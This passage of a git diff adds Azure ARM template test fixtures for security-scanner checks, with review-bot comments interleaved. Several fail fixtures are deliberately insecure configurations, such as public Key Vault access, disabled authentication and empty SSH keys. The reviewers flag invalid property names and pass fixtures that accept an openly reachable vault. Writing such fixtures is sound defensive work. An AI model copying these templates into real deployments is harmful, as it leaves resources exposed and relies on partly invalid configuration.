"detailedErrorLoggingEnabled": true, + "httpLoggingEnabled": true, + "requestTracingEnabled": true, + "ftpsState": "Disabled", + "minTlsVersion": "1.2" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', parameters('serverFarmName'))]", + "[resourceId('Microsoft.Web/sites', parameters('webAppNameBackend'))]" + ] + }, + { + "type": "Microsoft.Web/sites", + "apiVersion": "2021-02-01", + "name": "sites_pass", + "location": "[parameters('location')]", + "properties": { + "httpsOnly": true, + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanPortalName'))]", + "siteConfig": { + "linuxFxVersion": "[parameters('linuxFxVersion')]", + 
"minTlsVersion": "1.2", + "ftpsState": "FtpsOnly" + } + }, + "identity": { + "type": "SystemAssigned" + }, + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanPortalName'))]" + ] + } + ] +} diff --git a/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail.json b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail.json new file mode 100644 index 00000000000..b8950b3a4be --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail.json @@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Web/sites/config", + "apiVersion": "2021-02-01", + "name": "authsettingsV2", + "properties": { + "httpSettings": { + "forwardProxy": { + "convention": "Custom" + } + } + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail2.json b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail2.json new file mode 100644 index 00000000000..ef6c7f7116d --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/fail2.json @@ -0,0 +1,21 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Web/sites/config", + "apiVersion": "2021-02-01", + "name": "authsettingsV2", + "properties": { + "httpSettings": { + "forwardProxy": { + "convention": "Custom" + } + }, + "platform": { + "enabled": false + } + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass.json b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass.json new file mode 100644 index 00000000000..3e721e2de93 --- /dev/null 
+++ b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass.json @@ -0,0 +1,21 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Web/sites/config", + "apiVersion": "2021-02-01", + "name": "authsettingsV2", + "properties": { + "httpSettings": { + "forwardProxy": { + "convention": "Custom" + } + }, + "platform": { + "enabled": true + } + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass2.json b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass2.json new file mode 100644 index 00000000000..9f64e9cf531 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppsEnableAuthentication/pass2.json @@ -0,0 +1,18 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Web/sites/config", + "apiVersion": "2021-02-01", + "name": "pass", + "properties": { + "httpSettings": { + "forwardProxy": { + "convention": "Custom" + } + } + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail1.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail1.json new file mode 100644 index 00000000000..43a3151522e --- /dev/null +++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail1.json 
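Review bot: pass2.json is fail.json with only the resource `name` changed from `authsettingsV2` to `pass`, so the name alone flips the result; the pair is the only place that documents that the check is scoped to a `Microsoft.Web/sites/config` resource named `authsettingsV2`, and a reader of the fixture directory cannot tell that from the files. Presumably the scoping is intentional, since auth settings live in that named sub-resource; if so, give pass2.json a name that says what it is testing, for example `"name": "notAuthSettings",`, so the fixture reads as "a config resource that is not authsettingsV2 is out of scope" rather than as a copy-paste of the fail case.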
@@ -0,0 +1,34 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.KeyVault/vaults",
+ "apiVersion": "2019-09-01",
+ "name": "fail1",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "enabledForDiskEncryption": true,
+ "tenantId": "[subscription().tenantId]",
+ "softDeleteRetentionInDays": 90,
+ "purgeProtectionEnabled": true,
+ "sku": {
+ "family": "A",
+ "name": "standard"
+ },
+ "publicNetworkAccess": "Enabled",
+ "accessPolicies": [
+ {
+ "tenantId": "[subscription().tenantId]",
+ "objectId": "[parameters('objectId')]",
+ "permissions": {
+ "keys": ["get"],
+ "secrets": ["get"],
+ "storage": ["get"]
+ }
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail2.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail2.json
new file mode 100644
index 00000000000..786513bac3f
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail2.json
@@ -0,0 +1,33 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.KeyVault/vaults",
+ "apiVersion": "2019-09-01",
+ "name": "fail2",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "enabledForDiskEncryption": true,
+ "tenantId": "[subscription().tenantId]",
+ "softDeleteRetentionInDays": 90,
+ "purgeProtectionEnabled": true,
+ "sku": {
+ "family": "A",
+ "name": "standard"
+ },
+ "accessPolicies": [
+ {
+ "tenantId": "[subscription().tenantId]",
+ "objectId": "[parameters('objectId')]",
+ "permissions": {
+ "keys": ["get"],
+ "secrets": ["get"],
+ "storage": ["get"]
+ }
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
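Review bot: Every fixture in example_KeyVaultDisablesPublicNetworkAccess (fail1 through fail5, pass1 through pass4) sets `"purgeProtectionEnabled": true`, which is not a `Microsoft.KeyVault/vaults` property; the ARM property is `enablePurgeProtection`, the spelling the example_KeyVaultEnablesPurgeProtection fixtures in this same commit use. It has no effect on the public-network-access check, but anyone who copies one of these fixtures into a real template gets a vault whose purge protection is at best ignored by the provider. Change the line to `"enablePurgeProtection": true,` in all nine files so the two fixture sets agree on the property name.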
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail3.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail3.json
new file mode 100644
index 00000000000..45bc2343b77
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail3.json
@@ -0,0 +1,38 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.KeyVault/vaults",
+ "apiVersion": "2019-09-01",
+ "name": "fail3",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "enabledForDiskEncryption": true,
+ "tenantId": "[subscription().tenantId]",
+ "softDeleteRetentionInDays": 90,
+ "purgeProtectionEnabled": true,
+ "sku": {
+ "family": "A",
+ "name": "standard"
+ },
+ "networkAcls": {
+ "defaultAction" : "Allow",
+ "bypass" : "AzureServices",
+ "ipRules" : []
+ },
+ "accessPolicies": [
+ {
+ "tenantId": "[subscription().tenantId]",
+ "objectId": "[parameters('objectId')]",
+ "permissions": {
+ "keys": ["get"],
+ "secrets": ["get"],
+ "storage": ["get"]
+ }
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail4.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail4.json
new file mode 100644
index 00000000000..445851bb760
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail4.json
@@ -0,0 +1,37 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.KeyVault/vaults",
+ "apiVersion": "2019-09-01",
+ "name": "fail4",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "enabledForDiskEncryption": true,
+ "tenantId": "[subscription().tenantId]",
+ "softDeleteRetentionInDays": 90,
+ "purgeProtectionEnabled": true,
+ "sku": {
+ "family": "A",
+ "name": "standard"
+ },
+ "networkAcls": {
+ "defaultAction" : "Allow",
+ "bypass" : "AzureServices"
+ },
+ "accessPolicies": [
+ {
+ "tenantId": "[subscription().tenantId]",
+ "objectId": "[parameters('objectId')]",
+ "permissions": {
+ "keys": ["get"],
+ "secrets": ["get"],
+ "storage": ["get"]
+ }
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail5.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail5.json
new file mode 100644
index 00000000000..a6574b63122
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/fail5.json
@@ -0,0 +1,32 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.KeyVault/vaults",
+ "apiVersion": "2019-09-01",
+ "name": "fail5",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "enabledForDiskEncryption": true,
+ "tenantId": "[subscription().tenantId]",
+ "softDeleteRetentionInDays": 90,
+ "purgeProtectionEnabled": true,
+ "sku": {
+ "family": "A",
+ "name": "standard"
+ },
+ "networkAcls": {
+ "defaultAction": "Allow",
+ "bypass": "AzureServices",
+ "ipRules": [],
+ "virtualNetworkRules": [
+ {
+ "id": "[if(parameters('naclsEnabled'),concat(subscription().id, '/resourceGroups/', parameters('resourceGroupName'), '/providers/Microsoft.Network/virtualNetworks//subnets/'),json('null'))]"
+ }
+ ]
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass1.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass1.json
new file mode 100644
index 00000000000..42ad47e7128
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass1.json
@@ -0,0 +1,34 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.KeyVault/vaults",
+ "apiVersion": "2019-09-01",
+ "name": "pass1",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "enabledForDiskEncryption": true,
+ "tenantId": "[subscription().tenantId]",
+ "softDeleteRetentionInDays": 90,
+ "purgeProtectionEnabled": true,
+ "sku": {
+ "family": "A",
+ "name": "standard"
+ },
+ "publicNetworkAccess": "Disabled",
+ "accessPolicies": [
+ {
+ "tenantId": "[subscription().tenantId]",
+ "objectId": "[parameters('objectId')]",
+ "permissions": {
+ "keys": ["get"],
+ "secrets": ["get"],
+ "storage": ["get"]
+ }
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass2.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass2.json
new file mode 100644
index 00000000000..39be5b74dd5
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass2.json
@@ -0,0 +1,38 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.KeyVault/vaults",
+ "apiVersion": "2019-09-01",
+ "name": "pass2",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "enabledForDiskEncryption": true,
+ "tenantId": "[subscription().tenantId]",
+ "softDeleteRetentionInDays": 90,
+ "purgeProtectionEnabled": true,
+ "sku": {
+ "family": "A",
+ "name": "standard"
+ },
+ "networkAcls" : {
+ "defaultAction" : "Allow",
+ "bypass" : "AzureServices"
+ },
+ "publicNetworkAccess": "disabled",
+ "accessPolicies": [
+ {
+ "tenantId": "[subscription().tenantId]",
+ "objectId": "[parameters('objectId')]",
+ "permissions": {
+ "keys": ["get"],
+ "secrets": ["get"],
+ "storage": ["get"]
+ }
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass3.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass3.json
new file mode 100644
index 00000000000..948b0381998
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass3.json
@@ -0,0 +1,39 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.KeyVault/vaults",
+ "apiVersion": "2019-09-01",
+ "name": "pass3",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "enabledForDiskEncryption": true,
+ "tenantId": "[subscription().tenantId]",
+ "softDeleteRetentionInDays": 90,
+ "purgeProtectionEnabled": true,
+ "sku": {
+ "family": "A",
+ "name": "standard"
+ },
+ "networkAcls": {
+ "defaultAction": "Allow",
+ "bypass": "AzureServices",
+ "ipRules": ["127.0.0.1"]
+ },
+ "publicNetworkAccess": "Enabled",
+ "accessPolicies": [
+ {
+ "tenantId": "[subscription().tenantId]",
+ "objectId": "[parameters('objectId')]",
+ "permissions": {
+ "keys": ["get"],
+ "secrets": ["get"],
+ "storage": ["get"]
+ }
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass4.json b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass4.json
new file mode 100644
index 00000000000..670a4888b40
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultDisablesPublicNetworkAccess/pass4.json
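Review bot: pass3.json is labelled a pass although the vault it describes is reachable from every network: `networkAcls.defaultAction` is `Allow` and `publicNetworkAccess` is `Enabled`, and Key Vault only applies `ipRules` when `defaultAction` is `Deny`, so the non-empty `ipRules` list adds no restriction here. If the check passes this fixture because `ipRules` is non-empty, the fixture is locking in a false negative; pass4.json in the next hunk has the same shape without the `publicNetworkAccess` line and is affected in the same way, and fail3.json/fail4.json show the opposite expectation for `Allow` with no rules. A pass fixture for the firewall path should set `"defaultAction": "Deny"`, and since `ipRules` entries in the vault schema are objects rather than strings, `"ipRules": [{ "value": "127.0.0.1" }]` would also match what the check sees in real templates.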
@@ -0,0 +1,38 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.KeyVault/vaults",
+ "apiVersion": "2019-09-01",
+ "name": "pass4",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "enabledForDiskEncryption": true,
+ "tenantId": "[subscription().tenantId]",
+ "softDeleteRetentionInDays": 90,
+ "purgeProtectionEnabled": true,
+ "sku": {
+ "family": "A",
+ "name": "standard"
+ },
+ "networkAcls": {
+ "defaultAction": "Allow",
+ "bypass": "AzureServices",
+ "ipRules": ["127.0.0.1"]
+ },
+ "accessPolicies": [
+ {
+ "tenantId": "[subscription().tenantId]",
+ "objectId": "[parameters('objectId')]",
+ "permissions": {
+ "keys": ["get"],
+ "secrets": ["get"],
+ "storage": ["get"]
+ }
+ }
+ ]
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/fail1.json b/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/fail1.json
new file mode 100644
index 00000000000..8219caa6546
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/fail1.json
@@ -0,0 +1,38 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.KeyVault/vaults",
+ "apiVersion": "2019-09-01",
+ "name": "fail1",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "enabledForDiskEncryption": false,
+ "tenantId": "[data.azure_client_config.current.tenantId]",
+ "softDeleteRetentionDays": 7,
+ "enablePurgeProtection": false,
+ "sku": {
+ "family": "A",
+ "name": "standard"
+ },
+ "accessPolicies": [
+ {
+ "tenantId": "[data.azure_client_config.current.tenantId]",
+ "objectId": "[data.azure_client_config.current.objectId]",
+ "permissions": {
+ "keys": [
+ "get"
+ ],
+ "secrets": [
+ "get"
+ ],
+ "certificates": [],
+ "storage": []
+ }
+ }
+ ]
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/fail2.json b/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/fail2.json
new file mode 100644
index 00000000000..fbf1be57cb6
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/fail2.json
@@ -0,0 +1,38 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.KeyVault/vaults",
+ "apiVersion": "2019-09-01",
+ "name": "fail2",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "enabledForDiskEncryption": true,
+ "tenantId": "[data.azure_client_config.current.tenantId]",
+ "softDeleteRetentionDays": 7,
+ "enablePurgeProtection": false,
+ "sku": {
+ "family": "A",
+ "name": "standard"
+ },
+ "accessPolicies": [
+ {
+ "tenantId": "[data.azure_client_config.current.tenantId]",
+ "objectId": "[data.azure_client_config.current.objectId]",
+ "permissions": {
+ "keys": [
+ "get"
+ ],
+ "secrets": [
+ "get"
+ ],
+ "certificates": [],
+ "storage": []
+ }
+ }
+ ]
+ }
+ }
+ ]
+}
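Review bot: fail1.json uses `softDeleteRetentionDays`, which is not the vault property name — the ARM schema, and the example_KeyVaultDisablesPublicNetworkAccess fixtures in this commit, use `softDeleteRetentionInDays` — and `[data.azure_client_config.current.tenantId]` / `[data.azure_client_config.current.objectId]` are Terraform data-source references, not ARM template expressions; the other Key Vault fixtures use `[subscription().tenantId]` and `[parameters('objectId')]`. Neither affects the purge-protection result, since the check only needs `enablePurgeProtection`, but a fixture should still model a valid template; fail2.json (same physical line) and pass.json (next hunk) repeat both. Change the retention line to `"softDeleteRetentionInDays": 7,` and replace the three `data.azure_client_config` references with the `subscription()` / `parameters()` forms used elsewhere.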
diff --git a/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/pass.json b/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/pass.json
new file mode 100644
index 00000000000..ec90b5e09e5
--- /dev/null
+++ b/tests/arm/checks/resource/example_KeyVaultEnablesPurgeProtection/pass.json
@@ -0,0 +1,34 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.KeyVault/vaults",
+ "apiVersion": "2019-09-01",
+ "name": "pass",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "enabledForDiskEncryption": false,
+ "tenantId": "[data.azure_client_config.current.tenantId]",
+ "softDeleteRetentionDays": 7,
+ "enablePurgeProtection": true,
+ "sku": {
+ "family": "A",
+ "name": "standard"
+ },
+ "accessPolicies": [
+ {
+ "tenantId": "[data.azure_client_config.current.tenantId]",
+ "objectId": "[data.azure_client_config.current.objectId]",
+ "permissions": {
+ "keys": ["get"],
+ "secrets": ["get"],
+ "certificates": [],
+ "storage": []
+ }
+ }
+ ]
+ }
+ }
+ ]
+ }
diff --git a/tests/arm/checks/resource/example_LinuxVMUsesSSH/fail.json b/tests/arm/checks/resource/example_LinuxVMUsesSSH/fail.json
new file mode 100644
index 00000000000..a1bf8d9c153
--- /dev/null
+++ b/tests/arm/checks/resource/example_LinuxVMUsesSSH/fail.json
@@ -0,0 +1,227 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "adminUsername": { + "type": "string", + "defaultValue": "azureuser", + "metadata": { + "description": "User name for the Virtual Machine." + } + }, + "sshKeyData": { + "type": "string", + "metadata": { + "description": "SSH rsa public key file as a string." + } + }, + "vmName": { + "type": "string", + "defaultValue": "multinicvm", + "metadata": { + "description": "Name of the VM" + } + }, + "vmSize": { + "defaultValue": "Standard_D2_v3", + "metadata": { + "description": "Size of the VM" + }, + "type": "string" + }, + "ubuntuOSVersion": { + "type": "string", + "defaultValue": "18.04-LTS", + "allowedValues": [ + "12.04.5-LTS", + "14.04.4-LTS", + "15.10", + "18.04-LTS" + ], + "metadata": { + "description": "The Ubuntu version for the VM. This will pick a fully patched image of this given Ubuntu version. Allowed values: 12.04.5-LTS, 14.04.4-LTS, 15.10, 18.04-LTS." 
+ } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "description" + } + } + }, + "variables": { + "storageAccountName": "[concat(uniquestring(resourceGroup().id), 'samultinic')]", + "storageAccountType": "Standard_LRS", + "imagePublisher": "Canonical", + "imageOffer": "UbuntuServer", + "sshKeyPath": "[concat('/home/',parameters('adminUsername'),'/.ssh/authorized_keys')]", + "nic1Name": "nic1", + "nic2Name": "nic2", + "vnetName": "vnet", + "vnetId": "[resourceId('Microsoft.Network/virtualNetworks', variables('vnetName'))]", + "addressPrefix": "10.0.0.0/16", + "subnet1Name": "Frontend", + "subnet1Id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('vnetName'), variables('subnet1Name'))]", + "subnet1Prefix": "10.0.1.0/24", + "subnet1PrivateAddress": "10.0.1.5", + "subnet2Name": "Web", + "subnet2Id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('vnetName'), variables('subnet2Name'))]", + "subnet2Prefix": "10.0.2.0/24", + "subnet2PrivateAddress": "10.0.2.5", + "publicIPAddressName": "[concat(uniquestring(resourceGroup().id), 'PublicIp')]", + "publicIPAddressType": "Dynamic", + "publicIPAddressId": "[resourceId('Microsoft.Network/publicIPAddresses', variables('publicIPAddressName'))]", + "networkSecurityGroupName": "default-NSG" + }, + "resources": [ + + { + "type": "Microsoft.Compute/virtualMachines", + "apiVersion": "2020-06-01", + "dependsOn": [ + "[resourceId('Microsoft.Storage/storageAccounts/', variables('storageAccountName'))]", + "[resourceId('Microsoft.Network/networkInterfaces/', variables('nic1Name'))]", + "[resourceId('Microsoft.Network/networkInterfaces/', variables('nic2Name'))]" + ], + "location": "[parameters('location')]", + "name": "fail", + "properties": { + "diagnosticsProfile": { + "bootDiagnostics": { + "enabled": true, + "storageUri": "[reference(resourceId('Microsoft.Storage/storageAccounts/', variables('storageAccountName')), 
'2019-06-01').primaryEndpoints.blob]" + } + }, + "hardwareProfile": { + "vmSize": "[parameters('vmSize')]" + }, + "networkProfile": { + "networkInterfaces": [ + { + "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nic1Name'))]", + "properties": { + "primary": true + } + }, + { + "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nic2Name'))]", + "properties": { + "primary": false + } + } + ] + }, + "osProfile": { + "computerName": "[parameters('vmName')]", + "adminUsername": "[parameters('adminUsername')]", + "linuxConfiguration": { + "disablePasswordAuthentication": true, + "ssh": { + "publicKeys": [ + { + + } + ] + } + } + }, + "storageProfile": { + "imageReference": { + "publisher": "[variables('imagePublisher')]", + "offer": "[variables('imageOffer')]", + "sku": "[parameters('ubuntuOSVersion')]", + "version": "latest" + }, + "osDisk": { + "createOption": "FromImage" + } + } + } + }, + { + "type": "Microsoft.Compute/virtualMachineScaleSets", + "name": "fail", + "location": "[parameters('location')]", + "apiVersion": "2019-12-01", + "dependsOn": [ + "[resourceId('Microsoft.Network/loadBalancers', variables('loadBalancerName'))]" + ], + "sku": { + "name": "[parameters('vmSku')]", + "capacity": "[parameters('instanceCount')]" + }, + "properties": { + "overprovision": true, + "upgradePolicy": { + "mode": "Manual" + }, + "virtualMachineProfile": { + "storageProfile": { + "osDisk": { + "createOption": "FromImage", + "caching": "ReadWrite" + }, + "imageReference": { + "publisher": "Canonical", + "offer": "UbuntuServer", + "sku": "16.04-LTS", + "version": "latest" + } + }, + "osProfile": { + "computerNamePrefix": "[parameters('vmssName')]", + "adminUsername": "[parameters('adminUsername')]", + "adminPassword": "[parameters('adminPasswordOrKey')]", + "linuxConfiguration": { + "disablePasswordAuthentication": true, + "ssh": { + "publicKeys": [ + { + + } + ] + } + } + }, + "networkProfile": { + "networkInterfaceConfigurations": [ + { + 
"name": "nic", + "properties": { + "primary": true, + "ipConfigurations": [ + { + "name": "ipconfig", + "properties": { + "subnet": { + "id": "[resourceId(parameters('existingVnetResourceGroupName'), 'Microsoft.Network/virtualNetworks/subnets', parameters('existingVnetName'), parameters('existingSubNetName'))]" + }, + "loadBalancerBackendAddressPools": [ + { + "id": "[resourceId('Microsoft.Network/loadBalancers/backendAddressPools', variables('loadBalancerName'), variables('loadBalancerBackEndName'))]" + } + ], + "loadBalancerInboundNatPools": [ + { + "id": "[resourceId('Microsoft.Network/loadBalancers/inboundNatPools', variables('loadBalancerName'), variables('loadBalancerNatPoolName'))]" + } + ] + } + } + ] + } + } + ] + } + } + } + } + ], + "outputs": { + "sshCommand": { + "type": "string", + "value": "[concat('ssh ', parameters('adminUsername'), '@', parameters('vmName'), '.', parameters('location'), '.cloudapp.azure.com')]" + } + } +} diff --git a/tests/arm/checks/resource/example_LinuxVMUsesSSH/pass.json b/tests/arm/checks/resource/example_LinuxVMUsesSSH/pass.json new file mode 100644 index 00000000000..7a2fa9ba29d --- /dev/null +++ b/tests/arm/checks/resource/example_LinuxVMUsesSSH/pass.json 
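Review bot: Both resources in fail.json set `"disablePasswordAuthentication": true` and fail only because the single `ssh.publicKeys` entry is an empty object, so the fixture exercises the missing-key branch but never the case where password authentication is left enabled, which is presumably the check's primary condition (pass.json starts at the next hunk and is cut off, so I cannot confirm which branches it covers). A second fail resource, or a fail2.json, with `"disablePasswordAuthentication": false` and no `ssh` block would pin that branch. The VMSS resource also pairs `"adminPassword": "[parameters('adminPasswordOrKey')]"` with disabled password authentication and references `variables('loadBalancerName')`, `parameters('vmSku')`, `parameters('instanceCount')`, `parameters('vmssName')` and `parameters('adminPasswordOrKey')`, none of which the template declares; trimming those to what the check reads (`osProfile.linuxConfiguration`) would make the fixture both valid and easier to read.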
@@ -0,0 +1,229 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "adminUsername": { + "type": "string", + "defaultValue": "azureuser", + "metadata": { + "description": "User name for the Virtual Machine." + } + }, + "sshKeyData": { + "type": "string", + "metadata": { + "description": "SSH rsa public key file as a string." + } + }, + "vmName": { + "type": "string", + "defaultValue": "multinicvm", + "metadata": { + "description": "Name of the VM" + } + }, + "vmSize": { + "defaultValue": "Standard_D2_v3", + "metadata": { + "description": "Size of the VM" + }, + "type": "string" + }, + "ubuntuOSVersion": { + "type": "string", + "defaultValue": "18.04-LTS", + "allowedValues": [ + "12.04.5-LTS", + "14.04.4-LTS", + "15.10", + "18.04-LTS" + ], + "metadata": { + "description": "The Ubuntu version for the VM. This will pick a fully patched image of this given Ubuntu version. Allowed values: 12.04.5-LTS, 14.04.4-LTS, 15.10, 18.04-LTS." 
+ } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "description" + } + } + }, + "variables": { + "storageAccountName": "[concat(uniquestring(resourceGroup().id), 'samultinic')]", + "storageAccountType": "Standard_LRS", + "imagePublisher": "Canonical", + "imageOffer": "UbuntuServer", + "sshKeyPath": "[concat('/home/',parameters('adminUsername'),'/.ssh/authorized_keys')]", + "nic1Name": "nic1", + "nic2Name": "nic2", + "vnetName": "vnet", + "vnetId": "[resourceId('Microsoft.Network/virtualNetworks', variables('vnetName'))]", + "addressPrefix": "10.0.0.0/16", + "subnet1Name": "Frontend", + "subnet1Id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('vnetName'), variables('subnet1Name'))]", + "subnet1Prefix": "10.0.1.0/24", + "subnet1PrivateAddress": "10.0.1.5", + "subnet2Name": "Web", + "subnet2Id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('vnetName'), variables('subnet2Name'))]", + "subnet2Prefix": "10.0.2.0/24", + "subnet2PrivateAddress": "10.0.2.5", + "publicIPAddressName": "[concat(uniquestring(resourceGroup().id), 'PublicIp')]", + "publicIPAddressType": "Dynamic", + "publicIPAddressId": 